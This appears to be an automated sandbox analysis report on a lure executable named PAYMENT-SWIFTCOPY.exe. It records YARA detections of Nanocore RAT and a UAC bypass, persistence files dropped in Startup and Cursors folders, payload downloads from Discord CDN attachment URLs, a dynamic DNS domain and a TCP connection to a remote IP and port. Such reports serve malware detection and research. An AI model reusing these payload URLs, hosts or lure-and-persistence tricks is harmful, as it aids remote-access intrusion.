              Source: Yara matchFile source: 0000001D.00000002.561744812.000000000762B000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.582925885.0000000003171000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.590978202.00000000067E0000.00000004.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.588590470.0000000004171000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.407577726.00000000092C3000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PAYMENT-SWIFTCOPY.exe PID: 3492, type: MEMORYSTR
              Multi AV Scanner detection for submitted fileShow sources
              Source: PAYMENT-SWIFTCOPY.exeReversingLabs: Detection: 25%
              Multi AV Scanner detection for dropped fileShow sources
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeReversingLabs: Detection: 25%
              Source: C:\Windows\Cursors\???????????????\svchost.exeReversingLabs: Detection: 25%
              Machine Learning detection for sampleShow sources
              Source: PAYMENT-SWIFTCOPY.exeJoe Sandbox ML: detected
              Machine Learning detection for dropped fileShow sources
              Source: C:\Windows\Cursors\???????????????\svchost.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeJoe Sandbox ML: detected

              Exploits:

              barindex
              Yara detected UAC Bypass using CMSTPShow sources
              Source: Yara matchFile source: 0.0.PAYMENT-SWIFTCOPY.exe.8120000.9.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.PAYMENT-SWIFTCOPY.exe.9191098.14.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.PAYMENT-SWIFTCOPY.exe.9011058.12.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.PAYMENT-SWIFTCOPY.exe.9091078.11.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.PAYMENT-SWIFTCOPY.exe.9091078.11.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.PAYMENT-SWIFTCOPY.exe.9191098.14.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.PAYMENT-SWIFTCOPY.exe.8fd1038.10.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.PAYMENT-SWIFTCOPY.exe.8120000.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000001D.00000002.561998733.0000000007D80000.00000004.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.407199760.0000000009191000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.405143102.0000000008120000.00000004.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.561744812.000000000762B000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.406478127.0000000008FB1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.560276793.0000000006E1E000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PAYMENT-SWIFTCOPY.exe PID: 3492, type: MEMORYSTR
              Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.5:49745 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.5:49751 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.5:49752 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.5:49754 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.5:49759 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.5:49763 version: TLS 1.0
              Source: PAYMENT-SWIFTCOPY.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
              Source: PAYMENT-SWIFTCOPY.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
              Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.407199760.0000000009191000.00000004.00000001.sdmp, AdvancedRun.exe, 00000003.00000000.274141724.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp
              Source: Binary string: \??\C:\Windows\mscorlib.pdbO source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.393368692.0000000005CB6000.00000004.00000001.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.393368692.0000000005CB6000.00000004.00000001.sdmp
              Source: Binary string: iLC:\Windows\Microsoft.VisualBasic.pdb source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.405085971.0000000008118000.00000004.00000010.sdmp
              Source: Binary string: c.pdbis source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.405085971.0000000008118000.00000004.00000010.sdmp
              Source: Binary string: iVisualBasic.pdb source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.405085971.0000000008118000.00000004.00000010.sdmp
              Source: Binary string: \??\C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.PDB source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.393368692.0000000005CB6000.00000004.00000001.sdmp
              Source: Binary string: \??\C:\Windows\mscorlib.pdbW source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.393368692.0000000005CB6000.00000004.00000001.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdblm source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.393531655.0000000005CF0000.00000004.00000001.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb$ source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.393531655.0000000005CF0000.00000004.00000001.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.393531655.0000000005CF0000.00000004.00000001.sdmp
              Source: Binary string: .pdb-x source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.405085971.0000000008118000.00000004.00000010.sdmp
              Source: Binary string: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.PDB source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.405085971.0000000008118000.00000004.00000010.sdmp
              Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.393368692.0000000005CB6000.00000004.00000001.sdmp
              Source: Binary string: PAYMENT-SWIFTCOPY.PDB? source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.405085971.0000000008118000.00000004.00000010.sdmp
              Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.393368692.0000000005CB6000.00000004.00000001.sdmp

              Networking:

              barindex
              System process connects to network (likely due to code injection or exploit)Show sources
              Source: C:\Windows\Cursors\???????????????\svchost.exeDomain query: cdn.discordapp.com
              Uses dynamic DNS servicesShow sources
              Source: unknownDNS query: name: doc-file.ddns.net
              Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/902539094427578399/0CFA97D5.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/902539097346814013/779A1864.jpg HTTP/1.1Host: cdn.discordapp.com
              Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/902539094427578399/0CFA97D5.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/902539097346814013/779A1864.jpg HTTP/1.1Host: cdn.discordapp.com
              Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/902539094427578399/0CFA97D5.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/902539097346814013/779A1864.jpg HTTP/1.1Host: cdn.discordapp.com
              Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/902539094427578399/0CFA97D5.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/902539097346814013/779A1864.jpg HTTP/1.1Host: cdn.discordapp.com
              Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/902539094427578399/0CFA97D5.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/902539097346814013/779A1864.jpg HTTP/1.1Host: cdn.discordapp.com
              Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.5:49745 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.5:49751 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.5:49752 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.5:49754 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.5:49759 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.5:49763 version: TLS 1.0
              Source: global trafficTCP traffic: 192.168.2.5:49760 -> 194.5.98.32:9829
              Source: svchost.exe, 00000001.00000002.581875786.000001FBAF48A000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.407199760.0000000009191000.00000004.00000001.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
              Source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.407199760.0000000009191000.00000004.00000001.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
              Source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.407199760.0000000009191000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
              Source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.407199760.0000000009191000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
              Source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.407199760.0000000009191000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0
              Source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.354192498.0000000002BB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.352617039.0000000000832000.00000002.00020000.sdmp, ???????????????.exe, 00000016.00000000.303619783.0000000000AF2000.00000002.00020000.sdmpString found in binary or memory: http://tempuri.org/DetailsDataSet1.xsd
              Source: svchost.exe, 00000008.00000002.316396681.000001F314813000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.comsv
              Source: AdvancedRun.exe, AdvancedRun.exe, 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: svchost.exe, 00000006.00000002.575370087.0000027FE8043000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
              Source: svchost.exe, 00000006.00000002.575370087.0000027FE8043000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
              Source: svchost.exe, 00000006.00000002.575370087.0000027FE8043000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
              Source: svchost.exe, 00000008.00000003.313111037.000001F314861000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
              Source: svchost.exe, 00000006.00000002.575370087.0000027FE8043000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
              Source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.354192498.0000000002BB1000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com
              Source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.354192498.0000000002BB1000.00000004.00000001.sdmp, PAYMENT-SWIFTCOPY.exe, 00000000.00000000.352617039.0000000000832000.00000002.00020000.sdmp, ???????????????.exe, 00000016.00000000.303619783.0000000000AF2000.00000002.00020000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/902539094427578399/0CFA97D5.jpg
              Source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.354192498.0000000002BB1000.00000004.00000001.sdmp, PAYMENT-SWIFTCOPY.exe, 00000000.00000000.352617039.0000000000832000.00000002.00020000.sdmp, ???????????????.exe, 00000016.00000000.303619783.0000000000AF2000.00000002.00020000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/902539097346814013/779A1864.jpg
              Source: svchost.exe, 00000006.00000002.575370087.0000027FE8043000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
              Source: svchost.exe, 00000008.00000003.313162341.000001F31485E000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
              Source: svchost.exe, 00000008.00000003.313177364.000001F314859000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
              Source: svchost.exe, 00000008.00000003.313111037.000001F314861000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
              Source: svchost.exe, 00000008.00000002.318785440.000001F31483D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
              Source: svchost.exe, 00000008.00000003.313177364.000001F314859000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
              Source: svchost.exe, 00000008.00000003.313111037.000001F314861000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
              Source: svchost.exe, 00000008.00000003.313216317.000001F314847000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
              Source: svchost.exe, 00000008.00000003.313177364.000001F314859000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
              Source: svchost.exe, 00000008.00000003.313111037.000001F314861000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
              Source: svchost.exe, 00000008.00000002.318785440.000001F31483D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
              Source: svchost.exe, 00000008.00000003.313111037.000001F314861000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
              Source: svchost.exe, 00000008.00000003.313111037.000001F314861000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
              Source: svchost.exe, 00000008.00000003.313111037.000001F314861000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
              Source: svchost.exe, 00000008.00000003.313192005.000001F314840000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
              Source: svchost.exe, 00000008.00000003.313192005.000001F314840000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
              Source: svchost.exe, 00000008.00000003.313111037.000001F314861000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
              Source: svchost.exe, 00000008.00000003.313177364.000001F314859000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
              Source: svchost.exe, 00000008.00000003.313162341.000001F31485E000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
              Source: svchost.exe, 00000008.00000003.313177364.000001F314859000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
              Source: svchost.exe, 00000008.00000003.313177364.000001F314859000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
              Source: svchost.exe, 00000008.00000002.323889556.000001F314865000.00000004.00000001.sdmp, svchost.exe, 00000008.00000003.313192005.000001F314840000.00000004.00000001.sdmp, svchost.exe, 00000008.00000003.313162341.000001F31485E000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
              Source: svchost.exe, 00000008.00000003.313111037.000001F314861000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
              Source: svchost.exe, 00000008.00000002.318785440.000001F31483D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
              Source: svchost.exe, 00000008.00000003.289191177.000001F314832000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
              Source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.407199760.0000000009191000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0C
              Source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.407199760.0000000009191000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0D
              Source: svchost.exe, 00000008.00000002.318785440.000001F31483D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
              Source: svchost.exe, 00000008.00000002.316396681.000001F314813000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.318785440.000001F31483D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
              Source: svchost.exe, 00000008.00000003.313192005.000001F314840000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
              Source: svchost.exe, 00000008.00000003.313192005.000001F314840000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
              Source: svchost.exe, 00000008.00000003.289191177.000001F314832000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
              Source: svchost.exe, 00000008.00000003.289191177.000001F314832000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
              Source: svchost.exe, 00000008.00000003.313216317.000001F314847000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
              Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
              Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/902539094427578399/0CFA97D5.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/902539097346814013/779A1864.jpg HTTP/1.1Host: cdn.discordapp.com
              Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/902539094427578399/0CFA97D5.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/902539097346814013/779A1864.jpg HTTP/1.1Host: cdn.discordapp.com
              Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/902539094427578399/0CFA97D5.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/902539097346814013/779A1864.jpg HTTP/1.1Host: cdn.discordapp.com
              Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/902539094427578399/0CFA97D5.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/902539097346814013/779A1864.jpg HTTP/1.1Host: cdn.discordapp.com
              Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/902539094427578399/0CFA97D5.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/902539097346814013/779A1864.jpg HTTP/1.1Host: cdn.discordapp.com
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
              Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756

              E-Banking Fraud:

              barindex
              Yara detected Nanocore RATShow sources
              Source: Yara matchFile source: 0.0.PAYMENT-SWIFTCOPY.exe.92c39e8.15.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.PAYMENT-SWIFTCOPY.exe.92c39e8.15.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000001D.00000002.558493568.000000000542F000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.573231147.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.561744812.000000000762B000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.582925885.0000000003171000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.590978202.00000000067E0000.00000004.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.588590470.0000000004171000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.407577726.00000000092C3000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PAYMENT-SWIFTCOPY.exe PID: 3492, type: MEMORYSTR

              System Summary:

              barindex
              Malicious sample detected (through community Yara rule)Show sources
              Source: 0.0.PAYMENT-SWIFTCOPY.exe.92c39e8.15.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
              Source: 0.0.PAYMENT-SWIFTCOPY.exe.92c39e8.15.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
              Source: 0.0.PAYMENT-SWIFTCOPY.exe.92c39e8.15.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
              Source: 0.0.PAYMENT-SWIFTCOPY.exe.92c39e8.15.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
              Source: 0000001D.00000002.558493568.000000000542F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
              Source: 0000001D.00000002.558493568.000000000542F000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
              Source: 0000001F.00000002.573231147.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
              Source: 0000001F.00000002.573231147.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
              Source: 0000001F.00000002.585152245.0000000003234000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
              Source: 0000001F.00000002.581504296.00000000017D0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
              Source: 0000001F.00000002.592329083.0000000006CF0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
              Source: 0000001F.00000002.581875298.0000000001840000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
              Source: 0000001F.00000002.581821312.0000000001830000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
              Source: 0000001F.00000002.590731801.0000000006560000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
              Source: 0000001D.00000002.561744812.000000000762B000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
              Source: 0000001D.00000002.561744812.000000000762B000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
              Source: 0000001F.00000002.581540754.00000000017E0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
              Source: 0000001F.00000002.592081977.0000000006CA0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
              Source: 0000001F.00000002.590758914.0000000006570000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
              Source: 0000001F.00000002.590705398.0000000006550000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
              Source: 0000001F.00000002.590357866.0000000005C10000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
              Source: 0000001F.00000002.590829272.0000000006590000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
              Source: 0000001F.00000002.590978202.00000000067E0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
              Source: 0000001F.00000002.589022737.00000000044E7000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
              Source: 0000001F.00000002.590674805.0000000006540000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
              Source: 0000001F.00000002.581787117.0000000001820000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
              Source: 0000001F.00000002.588590470.0000000004171000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
              Source: 00000000.00000000.407577726.00000000092C3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
              Source: 00000000.00000000.407577726.00000000092C3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
              Source: Process Memory Space: PAYMENT-SWIFTCOPY.exe PID: 3492, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
              Source: Process Memory Space: PAYMENT-SWIFTCOPY.exe PID: 3492, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
              Initial sample is a PE file and has a suspicious nameShow sources
              Source: initial sampleStatic PE information: Filename: PAYMENT-SWIFTCOPY.exe
              Executable has a suspicious name (potential lure to open the executable)Show sources
              Source: PAYMENT-SWIFTCOPY.exeStatic file information: Suspicious name
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 3492 -ip 3492
              Source: PAYMENT-SWIFTCOPY.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: ???????????????.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: svchost.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dllJump to behavior
              Source: PAYMENT-SWIFTCOPY.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
